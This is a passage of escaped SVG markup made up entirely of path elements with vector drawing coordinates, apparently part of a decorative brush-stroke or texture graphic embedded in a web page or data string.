d=\"M119,89.8c2.2.2,4.2.6,2,.7a26.11,26.11,0,0,1,2.8.1c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5C122.6,90,119.9,89.5,119,89.8Z\"></path>\n        <path d=\"M305.8,93.8c-.6.5,7.3.4,10,.3C312.4,93.7,308.9,94.1,305.8,93.8Z\"></path>\n        <path d=\"M383.2,94.8c4.5-.5,2,.4,6,.5.2-.5-1.5-.8-7.8-.9C381.8,94.5,381.2,94.8,383.2,94.8Z\"></path>\n        <path d=\"M312.9,90.7c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C309.3,91.2,313.2,91.2,312.9,90.7Z\"></path>\n        <path d=\"M477.8,95.1c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C476.5,95.3,476.8,95.2,477.8,95.1Z\"></path>\n        <path d=\"M320.4,91.3c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C320.8,91.7,324.3,91.5,320.4,91.3Z\"></path>\n        <path d=\"M122.5,85.9c.2.3-4.3.8.9,1C122.6,86.6,126.8,86.2,122.5,85.9Z\"></path>\n        <path d=\"M311.1,90.3c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C303.4,89.8,308.8,89.9,311.1,90.3Z\"></path>\n        <path d=\"M163.4,85.1c4.8.2,7.4-.4,2.2-.6C163.8,84.6,165.2,85,163.4,85.1Z\"></path>\n        <path d=\"M422,90c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C418.8,90.3,425.8,90.5,422,90Z\"></path>\n        <path d=\"M315,86.9c-5.7-.1-11.4.9-5.9,1.2-1.1-.3.2-.4,4-.2C307.8,87.2,319.7,87.3,315,86.9Z\"></path>\n        <path d=\"M321.2,86c3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.4.2-2.5.7,2.2.9,1.4-.6,2,.4,7.2.3C326.4,86.9,326.5,85.9,321.2,86Z\"></path>\n        <path d=\"M352.5,86.8c-1.5-.7-5.1,0-8.8-.5,1.6.5-.5.8,3.6,1C346,86.8,349.2,86.5,352.5,86.8Z\"></path>\n        <path d=\"M500.2,90.5c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A25,25,0,0,1,500.2,90.5Z\"></path>\n        <path d=\"M359,86.3c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C362.5,85.8,360.3,86,359,86.3Z\"></path>\n        <path d=\"M474.6,88.3c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A37.42,37.42,0,0,0,474.6,88.3Z\"></path>\n        <path d=\"M147.8,78.4c1.8-.3-4.9-.2-4.5-.4,6.3-.1-3.5-.6,2.3-.6-2.7,0-3.2-.2-5.8-.2.5.9,3.7,1.5-1.1,1.9,4.5.4,2,1.2,7,1.6,0-.5,1.5-1.1-1.6-1.8,1.4-.2,6.1.4,5.5-.1C146.3,78.7,142.1,78,147.8,78.4Z\"></path>\n        <path d=\"M317,84.4c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C315.3,84.2,312.8,84.2,317,84.4Z\"></path>\n        <path d=\"M265.7,81.4c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C267.7,82.1,268.8,81.5,265.7,81.4Z\"></path>\n        <path d=\"M182.7,80.2c-4.1-.3-1.3-1-6.7-1.2C177.3,79.3,176.1,79.8,182.7,80.2Z\"></path>\n        <path d=\"M238.5,80.4c1.8.3-3.8.4.6.7-1-.4,3.6-.2,3.8-.5C240.9,80.6,239.7,80.5,238.5,80.4Z\"></path>\n        <path d=\"M335.4,83.2c4.5.2,7.8-.1,3.9-.4C338.9,83,333.8,82.8,335.4,83.2Z\"></path>\n        <path d=\"M118,77.6a10.17,10.17,0,0,1-2.7,0q0,.45,3.3.6C116.8,78,122.4,77.9,118,77.6Z\"></path>\n        <path d=\"M126.7,78c3.7.1,4.6.4,8.8.5-.2-.3-1.8-.6-4.8-.8C130.7,78,126,77.8,126.7,78Z\"></path>\n        <path d=\"M308.8,81.4c-.8.3-1,.4,2,.7-1.6-.4,3.5-.1,3.9-.3C310.3,81.8,311.1,81.5,308.8,81.4Z\"></path>\n        <path d=\"M246.7,80.3c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C253.5,80.5,245.4,80,246.7,80.3Z\"></path>\n        <path d=\"M173.5,77.7c5.8.1,1,.9,5.1,1.1,1.8-.6,3.6-1.6-3.4-2.3-4.1.2,3.1.7,2.4,1.1A37.48,37.48,0,0,0,173.5,77.7Z\"></path>\n        <path d=\"M315.9,81.5c0-.3,2.2-.4,2.1-.7C314.1,80.7,312.8,81.3,315.9,81.5Z\"></path>\n        <path d=\"M351.3,82.2c.3-.4,1.3-.5-3.4-.7C348.9,81.7,346.2,82.2,351.3,82.2Z\"></path>\n        <path d=\"M220.8,79.3c.6-.2,3.2-.2,2.2-.6C219.9,78.7,215.9,79.1,220.8,79.3Z\"></path>\n        <path d=\"M152.4,77.3c1.7-.3,1.1-.6-3.5-.8C149,76.8,150,77.1,152.4,77.3Z\"></path>\n        <path d=\"M347.3,79.3c-5-.2-2.6.8-.6.9C349,79.9,345.9,79.7,347.3,79.3Z\"></path>\n        <path d=\"M139.5,75.2c3.9,0,3.8.2,7.2.3C147.6,75.1,139.3,74.8,139.5,75.2Z\"></path>\n        <path d=\"M172.1,74.5c2.1.1,2.6.2,4.5.3-2.4-.6-2-.8-3.9-1.3C172.9,73.9,170.7,74,172.1,74.5Z\"></path>\n        <path d=\"M130.5,72.9c1,.3,3.1.5,4.8.8C135.1,73.3,135.5,72.9,130.5,72.9Z\"></path>\n        <path d=\"M390.3,79.2c-.3-.4,3.6-.4,5-.7C389,78.2,386.2,78.8,390.3,79.2Z\"></path>\n        <path d=\"M218.2,74.8c4.3.1,5.6-.7,1.9-1C221.2,74.2,214.3,74.4,218.2,74.8Z\"></path>\n        <path d=\"M177.5,72.7c.3.3.5.6.8.9C183.5,73.7,183.6,72.9,177.5,72.7Z\"></path>\n        <path d=\"M149.2,72.1c-3.4-.1-3.5-.4-6.1-.6,1.5.6,1.7,1.2,8.3,1.5C152,72.6,143.3,72.2,149.2,72.1Z\"></path>\n        <path d=\"M128,71.6c3.6-.2-3.4-.8.5-1-3.8,0-3.1-.3-5.9-.4C125.5,70.9,122.7,71.1,128,71.6Z\"></path>\n        <path d=\"M146.2,70.3c-4.5-.1-2.4.4-5.2.4,3.4.1,1.8.5,4.7.7a11.09,11.09,0,0,1,2.7,0c-3.1-.6,1.1,0,2.4-.4C146.9,70.6,144,70.8,146.2,70.3Z\"></path>\n        <path d=\"M431.6,77.4a4.41,4.41,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C430.2,77.2,428,77.6,431.6,77.4Z\"></path>\n        <path d=\"M407.6,76.8c.4-.3,4.1-.4,3.5-.8C407.2,76,405.6,76.7,407.6,76.8Z\"></path>\n        <path d=\"M315.5,74.8c.8-.4-3.7-.6-.7-.8C310.2,73.7,311.1,74.8,315.5,74.8Z\"></path>\n        <path d=\"M229.6,72c1.7.1,4,.1,4.4.2s0,.3,1.7.4c1.7-.3-1.2-.6-3.6-1C231.6,71.7,227.7,71.6,229.6,72Z\"></path>\n        <path d=\"M144.8,70.2c-2.6-.4,5.6-.3.8-.6-1.3.1-2.6.2-4,.2.2-.2-.7-.4-3.2-.5-.4.3,3.5.5.6.7A53.44,53.44,0,0,1,144.8,70.2Z\"></path>\n        <path d=\"M421.4,75.2c-4.3-.1-5.3.1-8.2.1a10.34,10.34,0,0,0,3.3.6C416.9,75.6,422.5,75.7,421.4,75.2Z\"></path>\n        <path d=\"M380.2,74c-.8.3-1.1,1,5.2,1.2C383.3,74.9,382.7,74.4,380.2,74Z\"></path>\n        <path d=\"M372.6,75c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C370.8,74.9,369.7,74.7,372.6,75Z\"></path>\n        <path d=\"M441.1,75.5a45.38,45.38,0,0,0,4.9.9C448.4,76.2,447.3,75.5,441.1,75.5Z\"></path>\n        <path d=\"M152,69c-1.1.2-5.6,0-3.8.5,2.1,0,5.3.2,5.6,0-1.1-.1-2.8-.1-2.9-.2C150.6,69.2,156.8,69.2,152,69Z\"></path>\n        <path d=\"M366.4,74.2c-1-.3,5.6-.5-2-.7C365.4,73.7,363.2,74.1,366.4,74.2Z\"></path>\n        <path d=\"M126.5,68.3c.3.1,0,.3,1.7.4.2-.3,4.1-.2,5.3-.3C130.2,68.3,128,68.3,126.5,68.3Z\"></path>\n        <path d=\"M405.8,74.7c2.5-.2,5-.1,2.3-.5C404.5,74.1,402.6,74.6,405.8,74.7Z\"></path>\n        <path d=\"M154.1,68.3c-.2.2-5.2,0-5.4.2,5.2,0,2.6.5,7.4.5C155.2,68.8,157.3,68.4,154.1,68.3Z\"></path>\n        <path d=\"M188.2,69.1c-7.4-.3-2.7.8.4.4C185,69.4,187.8,69.1,188.2,69.1Z\"></path>\n        <path d=\"M450,74.5c1,.4,2.4.7,6.4.9A26.64,26.64,0,0,0,450,74.5Z\"></path>\n        <path d=\"M142.7,67.8c.6.2,12.2.6,7.1.2,0,.1-.1.1-1.3.1-.3-.1,0-.3-1.7-.4C146.8,67.9,142.9,67.7,142.7,67.8Z\"></path>\n        <path d=\"M184.6,68.1c-6.5,0-5.1.1-8.7-.4-.3.3-.2.4-3.7.6,4.4.2,5.8.1,10.1.4,1.5-.1,1.4-.2-.4-.4C183.6,68.3,185.2,68.3,184.6,68.1Z\"></path>\n        <path d=\"M153.3,67.3c-4.5-.2-5.7,0-6.8.2,2.5,0,4.4.1,5.8.2C151.7,67.5,153.6,67.5,153.3,67.3Z\"></path>\n        <path d=\"M287.9,70.2c-3-.2-5.8-.4-8.8-.5C278.3,70,286.9,70.4,287.9,70.2Z\"></path>\n        <path d=\"M409.8,73c.8-.3,1.6-.6-2.1-.8C409.2,72.6,404.2,72.7,409.8,73Z\"></path>\n        <path d=\"M47.3,63.6c-.3.3-3.9.2-3.7.6C46.9,64.2,51,63.9,47.3,63.6Z\"></path>\n        <path d=\"M126.3,64.9a22.4,22.4,0,0,0,4.8.8c-.1-.1,2.4,0,2.7-.2C129.7,65.4,130.9,65,126.3,64.9Z\"></path>\n        <path d=\"M45.5,63.1a23.75,23.75,0,0,1,2.8.1c-1-.4,3-.6-3.5-.8-.2.4,3.1.6-.8.6C44.8,63,45.6,63,45.5,63.1Z\"></path>\n        <path d=\"M337.1,69.4c-2.2-.5,4.5-.2,5.2-.4C338.5,68.4,330.4,69.2,337.1,69.4Z\"></path>\n        <path d=\"M267.4,65.9a10.66,10.66,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3C264.3,66.9,272.2,66.3,267.4,65.9Z\"></path>\n        <path d=\"M49.3,61.1c-5-.2-1.1.5-5.2.4,2.2.2,6.4.2,6.1.6-3.8,0-3-.3-5.9-.4.8.6,7.8.6,10.1.3C50,61.9,49.2,61.6,49.3,61.1Z\"></path>\n        <path d=\"M411.5,70.2c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C408.2,69.8,409.3,70,411.5,70.2Z\"></path>\n        <path d=\"M127.1,62.8c-2,.1-8.6.3-3.6.7C121.5,63,131.3,63.1,127.1,62.8Z\"></path>\n        <path d=\"M242.9,64.9c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C245.7,65.1,247.4,65.1,242.9,64.9Z\"></path>\n        <path d=\"M254.7,65.6c2,.1,2.5.2,4.4.3-2.4-.5-.6-.7.4-1.1C255,64.9,253.7,65.1,254.7,65.6Z\"></path>\n        <path d=\"M408.6,68.5c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C413.4,68.8,411.6,68.6,408.6,68.5Z\"></path>\n        <path d=\"M312.4,66.5c.8-.4-2.8-.5-4.9-.8C304.3,66,309.5,66.3,312.4,66.5Z\"></path>\n        <path d=\"M214.1,63.7a54.5,54.5,0,0,0-7,0c2.3.1,1.1.3,3.1.4.1-.1-.5-.3,1.1-.3C213.1,63.9,214.4,64,214.1,63.7Z\"></path>\n        <path d=\"M345.5,66.3c-.6-.3-4.5.8.7.8C349.2,66.9,344.7,66.6,345.5,66.3Z\"></path>\n        <path d=\"M255.4,64.9c2.3-.2-.1-1-3.4-.7C256.5,64.4,249,64.7,255.4,64.9Z\"></path>\n        <path d=\"M365.6,66.9c-4,.1-13.3-.4-14-.1C353.2,66.8,366.6,67.6,365.6,66.9Z\"></path>\n        <path d=\"M149.8,61.8c-.4.3,2.2.5,4.7.7C154.5,62.1,154.2,61.8,149.8,61.8Z\"></path>\n        <path d=\"M106.4,61.3c-2.3-.4,5.9-.4.7-.7.3.2-.9.2-2.7,0C105.4,60.8,103.3,61.2,106.4,61.3Z\"></path>\n        <path d=\"M335.9,66.4c4.3.2,5.7-.3,2.3-.5C337.8,66.1,335.4,66.1,335.9,66.4Z\"></path>\n        <path d=\"M65.7,59.3c1.9.6-.8.7,3.7,1.1C69.3,60,68.7,59.6,65.7,59.3Z\"></path>\n        <path d=\"M56.2,59.5c4.4.1,4.7.5,7.6.7C65.4,59.8,58.3,59.3,56.2,59.5Z\"></path>\n        <path d=\"M59.6,57.1c-2.1,0-5.3-.2-5.6,0,6.7.2,3.9.9,8.1,1.3,1-.4,6.1.4,1.8.5,1.9,0,3.1.1,4.3.2,2.3-.1-1.6-.4-.7-.8C60.9,58.1,63.4,57.4,59.6,57.1Z\"></path>\n        <path d=\"M38.7,57c2.2.5.4,1.2,6.8,1.5C39.5,57.8,46.5,57.5,38.7,57Z\"></path>\n        <path d=\"M116.7,58.8c4.6.5,2.4,1,6.6,1.2-2.1-.5,1.9-.4,2.2-.7C120.5,59.3,121.1,58.9,116.7,58.8Z\"></path>\n        <path d=\"M105.5,58.7c.1.4,5.3.5,7.6.7A53.68,53.68,0,0,0,105.5,58.7Z\"></path>\n        <path d=\"M269.6,62c2.2.4-7,.5.7.8C268.8,62.5,274,62.3,269.6,62Z\"></path>\n        <path d=\"M151.7,59.2a15.43,15.43,0,0,0,4.9.8C153.3,59.5,158.6,59.4,151.7,59.2Z\"></path>\n        <path d=\"M332.9,62.9c.4.3,1.3.5,3.4.7,1.6-.2-.4-.2.9-.5C335.3,63.1,334,63,332.9,62.9Z\"></path>\n        <path d=\"M253.4,61c2,0,3.2.1,4.4.2,0-.1.2-.3,2.6-.2a9.4,9.4,0,0,0-3.2-.5A19.4,19.4,0,0,1,253.4,61Z\"></path>\n        <path d=\"M104.2,57.2a34.16,34.16,0,0,0-6.7.3C102.2,57.7,104.2,57.5,104.2,57.2Z\"></path>\n        <path d=\"M33.6,54.3c3.4.5-.7,1,3.9,1.3C35.6,55,41.5,54.6,33.6,54.3Z\"></path>\n        <path d=\"M140.1,57c7.7.1,4.9-.6.5-1C142,56.5,139.8,56.6,140.1,57Z\"></path>\n        <path d=\"M344,61.3c1.8-.1,8.3-.4,2.1-.7,1.1.3-.2.4-4,.2C342.5,61,342,61.2,344,61.3Z\"></path>\n        <path d=\"M88.8,53.9c2.3.5-2.1,1.3,2.6,1.4C89.3,54.7,94.7,54.3,88.8,53.9Z\"></path>\n        <path d=\"M193.6,56.3a38.23,38.23,0,0,0,6.3.8C199.3,56.7,198.3,56.4,193.6,56.3Z\"></path>\n        <path d=\"M95.7,53.9a9.77,9.77,0,0,0-3.5-.8C90.8,53.1,92.2,53.7,95.7,53.9Z\"></path>\n        <path d=\"M343.9,58.2c-3.5-.1-6.8-.1-8.6-.3,1.9.3,6.3.5,9,.7C344.2,58.5,344.1,58.3,343.9,58.2Z\"></path>\n        <path d=\"M200.4,54.5c-1.8.1-2,.7,2.1.8C199,54.9,204.1,54.8,200.4,54.5Z\"></path>\n        <path d=\"M306.6,56.8c.2.3,1.2.6,3.5.8C309.6,57.3,310.7,56.9,306.6,56.8Z\"></path>\n        <path d=\"M298.8,55.8c.9.5-4.5,0-7,0-.6.2-2.7.3-3.8.5,4.2-.2,14.1.2,16.5-.2C302.1,56,300.1,55.9,298.8,55.8Z\"></path>\n        <path d=\"M204.6,53.1c-5,0-.6-.7-6.2-.7C198.2,52.7,202.3,53.3,204.6,53.1Z\"></path>\n        <path d=\"M110.7,50.4a52.3,52.3,0,0,0-5.6,0c0,.3.2.5,3.3.6C107.5,50.6,110.1,50.6,110.7,50.4Z\"></path>\n        <path d=\"M308,55.2c-1.5-.6-7.4-1.1-1-1.1-4.2-.3-11.5-.3-14.5-.7l.2.2c4.2.2,8,.5,10.4.8C297.7,54.4,304.6,55,308,55.2Z\"></path>\n        <path d=\"M265.3,54.1c4.3.2,5.7-.3,2.3-.5C267.3,53.8,263.8,53.7,265.3,54.1Z\"></path>\n        <path d=\"M29.6,48.2c.9.2-1.2.5,1.9.6C32.3,48.6,36.7,48.4,29.6,48.2Z\"></path>\n        <path d=\"M333.9,54.7c-2.8.1-.5.9,3.6,1C337.4,55.1,338.3,55,333.9,54.7Z\"></path>\n        <path d=\"M113.1,49.9c-.4.3,1.7.5,6,.6C120.5,50.1,115,50.1,113.1,49.9Z\"></path>\n        <path d=\"M345.4,55c-1.9-.1-2.8-.2-5.8-.2.2.2.3.4.5.6C343.7,55.4,345.4,55.3,345.4,55Z\"></path>\n        <path d=\"M134.1,50.2c3,.1.8.5,4.4.3.3.1,0,.3,1.7.4C144.3,50.7,135.5,50,134.1,50.2Z\"></path>\n        <path d=\"M343.3,54.2c-4.7-.2-.8.3-5.5.1-.4-.2.2-.4-1.8-.5.2.2.3.4.5.6,2.1.1,3.7.2,5.9.4C340.9,54.4,344.1,54.5,343.3,54.2Z\"></path>\n        <path d=\"M281.2,53.1c-2.1-.2-.1-.7-4.8-.8C276.7,52.7,276.8,53.1,281.2,53.1Z\"></path>\n        <path d=\"M266.4,52.2c-2.5,0-4.4-.1-5.8-.2,1.8.2,4.6,1,7.6.7C266.1,52.6,266.7,52.3,266.4,52.2Z\"></path>\n        <path d=\"M165.1,49.1c-.9,0-1.7,0-1.3.1,3.8.2.9.7.8.9,4.8,0,3.9-.4,6.4-.6-5.2-.1-3.4.1-3-.3C166.9,49.2,166,49.1,165.1,49.1Z\"></path>\n        <path d=\"M356.2,53.1c-1.9-.1-2.8-.2-5.8-.2q0,.45,3.3.6C353.5,53.2,357.5,53.4,356.2,53.1Z\"></path>\n        <path d=\"M280.7,51.1c-3.1,0-4.9.1-5.3.3,2,0,3.2.1,4.4.2C278.3,51.2,281.5,51.3,280.7,51.1Z\"></path>\n        <path d=\"M304.1,50.8c-3.5,0-5.6.1-8.2.1,2.1.1,1.5.3,1.8.5,2,.2,5.3.2,7.3.4l-.4-.4a36.81,36.81,0,0,1-4.2-.1l-.2-.2C302.8,51.3,305.1,51.2,304.1,50.8Z\"></path>\n        <path d=\"M352.3,51.9c-4.7-.1-5.3.2-6.5.5,2.6,0,3.2.2,5.8.2C350.5,52.2,349.2,52.1,352.3,51.9Z\"></path>\n        <path d=\"M289.7,50.2c-4.5,0-2.3-.4-5.9-.5C282.9,50.1,288.5,50.6,289.7,50.2Z\"></path>\n        <path d=\"M362.9,51.3c-4.3,0-4.3-.3-8.6-.3C354.5,51.3,363.5,51.6,362.9,51.3Z\"></path>\n        <path d=\"M344.4,50.7c3.4-.3-.7-1.2,4.4-1.3,0-.3-2.5-.4-4.6-.5C347.9,49.5,339.4,50.2,344.4,50.7Z\"></path>\n        <path d=\"M363.6,50.5c-4,.1-9.2.1-2.4.4.1.1.3.1,1.5.1C361.3,50.7,364.5,50.8,363.6,50.5Z\"></path>\n        <path d=\"M356.6,48.8c.3.3-2.2.3-.8.6,3.5.1,6.9.2,6.9-.1-1.7-.1-4-.1-4.4-.2A4.48,4.48,0,0,0,356.6,48.8Z\"></path>\n        <path d=\"M341.9,48c.8.2.9.5,4.6.5C349,48.4,345.8,48.1,341.9,48Z\"></path>\n        <path d=\"M349.2,48.3c1.9,0,3.8.1,5.7.1-.2-.2-.3-.4-.5-.6C349.1,47.7,348.3,48,349.2,48.3Z\"></path>\n        <path d=\"M38.1,40.6c-4.5-.1-7.1.3-2.3.5C34.4,40.7,39.5,40.9,38.1,40.6Z\"></path>\n        <path d=\"M294.9,46.7c6.2.2,3.3-.4,3.5-.8C291.1,45.8,297.4,46.3,294.9,46.7Z\"></path>\n        <path d=\"M354.2,47.7c1.4-.2,4.4-.3,5.1-.5C355.5,47.1,350.1,47.4,354.2,47.7Z\"></path>\n        <path d=\"M259.6,44.5c5.7-.1,11.3.5,15.6.4-4.3-.2,1.2-.2-.4-.4-4.4-.1-8.4.2-11.3-.3C264.2,44.4,258.1,44.1,259.6,44.5Z\"></path>\n        <path d=\"M376.3,46c-3.7,0,.8-.6-4.6-.5,1.9.4,1.2.4-2.3.5a32.29,32.29,0,0,0-4.5-.4c2.3.5,6.6.7,3.7,1.1,1.7.1,3.9.2,7.2.3,1.1-.4-5.5-.3-4.7-.7A34.73,34.73,0,0,0,376.3,46Z\"></path>\n        <path d=\"M299.8,44.3c-1.1.1-3.1.7,2,.7C298.8,44.6,303.5,44.6,299.8,44.3Z\"></path>\n        <path d=\"M278.3,43.6c6.4,0,4.8.5,8.9.6-.9-.7,4.9-1-1.3-1.4.6.4-2.1.4-.6.9C283.3,43.6,277.9,43.3,278.3,43.6Z\"></path>\n        <path d=\"M337.4,44.4c-1.1.1-3.1.9,2.2.9C335.9,44.9,341.5,44.7,337.4,44.4Z\"></path>\n        <path d=\"M240.3,43.1c6.1.2,6.3-.2,8-.4C242.3,42.5,242,42.8,240.3,43.1Z\"></path>\n        <path d=\"M4.7,37.3c-.1-.3-.5-.7-3.5-.8C-.4,36.6.4,37.2,4.7,37.3Z\"></path>\n        <path d=\"M330.9,41.8c-3.8-.2-6.4.5-.9.5C328.6,42,331.8,42.1,330.9,41.8Z\"></path>\n        <path d=\"M324.5,40.8c5.4.7-5.9.3-7.8.6,6.7.1,11.6.1,16.7,0C328.9,41.3,328.8,40.9,324.5,40.8Z\"></path>\n        <path d=\"M0,33.6H0V34a24.24,24.24,0,0,0,3.4.2C3.3,34,2.2,33.7,0,33.6Z\"></path>\n        <path d=\"M7.9,31.5c-3-.2-4.9,0-7.3-.4-1.6.4,0,.8,4.6.5.6.8-4,1.8,3.7,2.6-.5-.2,1.4-.2,1-.4-2.9-.1-5.6-1.3.3-1.3C10.6,32.1,4.7,31.7,7.9,31.5Z\"></path>\n        <path d=\"M281.8,39.6c.2.2-3.9,0-4,.1,3.8,0,3,.3,5.9.4C285.3,40,285.1,39.7,281.8,39.6Z\"></path>\n        <path d=\"M310.4,40.6c.4-.3-1.7-.5-6.1-.6C304.8,40.3,306.8,40.5,310.4,40.6Z\"></path>\n        <path d=\"M302.2,39.1c-4.7-.2-.8.3-5.5.1,1.5.2.5.6,4.7.7C303.3,39.7,302.4,39.4,302.2,39.1Z\"></path>\n        <path d=\"M297.4,38.4c-8.1-.3-1.5.7,1.7.4C297.5,38.8,297.4,38.6,297.4,38.4Z\"></path>\n        <path d=\"M335,38.5c-1.1.1-.9.6,3.4.7A9.43,9.43,0,0,0,335,38.5Z\"></path>\n        <path d=\"M360.1,38.7a25.51,25.51,0,0,1-4.1,0c3.9.5-1.2.7-5.3.3-1.4.3,9.8.5,10,.3C355.6,39.1,365.3,38.9,360.1,38.7Z\"></path>\n        <path d=\"M304.7,37.3c.3.4,4,.5,6.3.8,1.6-.1,7.1-.4.7-.7C312.9,38,307.5,37.4,304.7,37.3Z\"></path>\n        <path d=\"M344,37.6c.1.3,4.2.4,6.1.6-.2-.2.5-.2,1.1-.3C347.2,37.9,347.3,37.7,344,37.6Z\"></path>\n        <path d=\"M347.9,35.8c1.5.2.5.6,4.8.7C352.6,36.1,352.2,35.8,347.9,35.8Z\"></path>\n        <path d=\"M291.2,34.6c.3-.4,3.8-.7-1.9-.6C293,34.2,284.7,34.4,291.2,34.6Z\"></path>\n        <path d=\"M280.1,33c1.1.7,9,.2,11.1,0C286.2,32.7,286.4,33.5,280.1,33Z\"></path>\n        <path d=\"M347.2,33.5c-4.3-.1-2.6.3-3.8.5C347.9,34.1,347.8,33.8,347.2,33.5Z\"></path>\n        <path d=\"M331.3,32.8c-.1.1-.2.3-2.6.2-.2.3,2.3.4,6,.5A8.62,8.62,0,0,0,331.3,32.8Z\"></path>\n        <path d=\"M338,30.8c-2.1.5-2.6.5-7.8.6,3,.3,6.6,0,10,.3C335.4,31.3,345,31.2,338,30.8Z\"></path>\n        <path d=\"M117,114.4c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A20.13,20.13,0,0,1,117,114.4Z\"></path>\n        <path d=\"M312.3,113.8c5.3.2,13.1.2,9.6-.1C321.3,114.2,312.6,113.3,312.3,113.8Z\"></path>\n        <path d=\"M227.3,108.8c-.7.6,1.8.9-1.8,1.2,2.8.1,2.1.3,5.9.4C227.6,109.9,235.6,109,227.3,108.8Z\"></path>\n        <path d=\"M345.3,108.6c-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.18,17.18,0,0,1,5.2-.4,2.23,2.23,0,0,0,1.4,0c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6C346,108.2,348,108.6,345.3,108.6Z\"></path>\n        <path d=\"M407.8,111.8c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C406.2,112,412.1,111.9,407.8,111.8Z\"></path>\n        <path d=\"M367.7,108.8c-5-.1,2.7-.3-1.7-.4-9.8.5-1.9,1.9-5.1,2.1,2.8,0,6.2.6,8.6.3C360.7,110.3,364.3,109,367.7,108.8Z\"></path>\n        <path d=\"M542.5,111.7c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C550.3,112.4,545.3,112,542.5,111.7Z\"></path>\n        <path d=\"M372.5,107.9c-9.1-.3-.3.9,1.9.6C371.3,108.4,373.4,108.1,372.5,107.9Z\"></path>\n        <path d=\"M347.2,104.4c3.2,1,2.4,1.5-5.3,1.8,3.6.1,5.6.3,6.1.6a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8C348.6,104.7,348.6,104.2,347.2,104.4Z\"></path>\n        <path d=\"M263.7,36.5c6.8.2,2.1.2,1.8.5,3.1,0,4.6.2,4.5.4a15.72,15.72,0,0,0-3.8.5c4.9,0,5.8-.3,9.3-.4a49.56,49.56,0,0,1-7.4-.5c.2-.3,4.2-.2,5.3-.3-3.7-.1-6.1-.2-6-.5C265.6,36.2,263.2,36.2,263.7,36.5Z\"></path>\n        <path d=\"M369.4,60.3c-1-.3-2.2-.4.9-.5-1.3-.2-4.7-.3-7.3-.4C362,59.8,367.2,60,369.4,60.3Z\"></path>\n        <path d=\"M174.1,64.2c4.8.3.4,1.2,8.4,1.6-2.3.2-4.3-.2-7,0,8.7.6,2.6,1.2,8.8,2.1-3.6-1,5.3-2-4.1-3a14.92,14.92,0,0,0,2.2-.5C181,64.4,175.8,63.9,174.1,64.2Z\"></path>\n        <path d=\"M164.2,48.1c.2-.1.3-.1.4-.2C164,47.9,163.7,48,164.2,48.1Z\"></path>\n        <path d=\"M329.2,36.7c-4,.6-9,.4-17.6.5,3.3.4,5.3.1,7.2.3-3.7.1,2.7.5,3.4.7-1.2.8-4.4,1.3.4,2.1-2.5,0-5-.4-5.7-.1,5,0,1.6.5,6.1.6-2.3-.6-.8-.1,4.1,0-1-.3-2.6-.6-3.6-1,1.5-.1,5.2-.1,6.8-.2-4.3-.2,3.1-.1,1-.4-4.1-.2-3.6.1-7,0-.1-.1-1.3-.2-1.6-.3,3.3,0,6.5,0,6.7-.3a36.81,36.81,0,0,1-4.2-.1c2.6,0-3.8-1,3.8-.5.1-.2-1.9-.6,2.5-.4C327.4,37.2,336.5,37,329.2,36.7Z\"></path>\n        <path d=\"M403.3,73.5c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A72.1,72.1,0,0,1,403.3,73.5Z\"></path>\n        <path d=\"M361.2,99.8c-4.4-.2-3,.7-2.3.6C360,100.2,362.6,100.2,361.2,99.8Z\"></path>\n        <path d=\"M310.5,99.1l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C305.8,98.5,308.6,99.1,310.5,99.1Z\"></path>\n        <path d=\"M502.5,102.5c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C500.4,102.5,501.4,102.5,502.5,102.5Z\"></path>\n        <path d=\"M360.4,95.7c6.3.3,2.6-.4,8.2-.1,3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-2.4.1-1.2.9-6.6.4C363.6,95.5,358.5,95.3,360.4,95.7Z\"></path>\n        <path 